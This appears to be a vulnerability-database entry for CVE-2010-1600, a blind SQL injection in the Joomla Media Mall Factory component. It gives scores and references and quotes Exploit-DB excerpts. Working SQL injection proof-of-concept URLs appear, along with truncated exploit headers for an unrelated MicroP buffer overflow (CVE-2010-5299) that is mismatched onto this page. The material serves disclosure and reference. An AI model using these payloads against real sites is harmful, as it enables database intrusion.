CVE-2010-1600
Published 2010-04-29
Priority P345, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.19% (64.0th percentile)
SQL injection vulnerability in the Media Mall Factory (com_mediamall) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the category parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thefactory | com_mediamall | — | — |
No detection rules found.
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
exploitdb·2014-03-14
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
---
#!/usr/bin/env ruby
# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Blog : http://www.ncoskun.com http://www.grisapka.org
# Vendor :http://sourceforge.net/projects/microp/
# Software link:http://sourceforge.net/projects/microp/files/latest/download
# version: 0.1.1.1600
# Tested on: windows XP sp2
# 4ewa2getha! ;)
#shellcode = http://www.exploit-db.com/exploits/28996/
#User32-free Messagebox Shellcode f
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-07-07
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: microp_mppl.rb 13114 2011-07-07 06:29:37Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA() function, and results
arbitrary code execution under the context
Exploit-DB
MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
exploitdb·2010-08-23
CVE-2010-5299 MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
---
# Exploit Title: MicroP malicious MPPL Buffer Overflow
# Date: 08/23/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/microp/
# Version: 0.1.1.1600
# Tested on: Windows XP SP3 EN
#! /usr/bin/evn ruby
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
Exploit-DB
Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
exploitdb·2010-04-14
CVE-2010-1600 Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
---
[o] Joomla Component Media Mall Factory Blind SQLi Vulnerability
Software : com_mediamall version 1.0.4
Vendor : http://www.thefactory.ro/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_mediamall&category=1[BSQL]
[o] PoC
http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=4 << false
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga
No writeups or analysis indexed.
http://secunia.com/advisories/39546
http://www.exploit-db.com/exploits/12234
http://www.osvdb.org/63940
http://www.packetstormsecurity.com/1004-exploits/joomlamediamallfactory-bsql.txt
http://www.securityfocus.com/bid/39488
http://www.thefactory.ro/shop/joomla-components/media-mall.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/57906
Published: 2010-04-29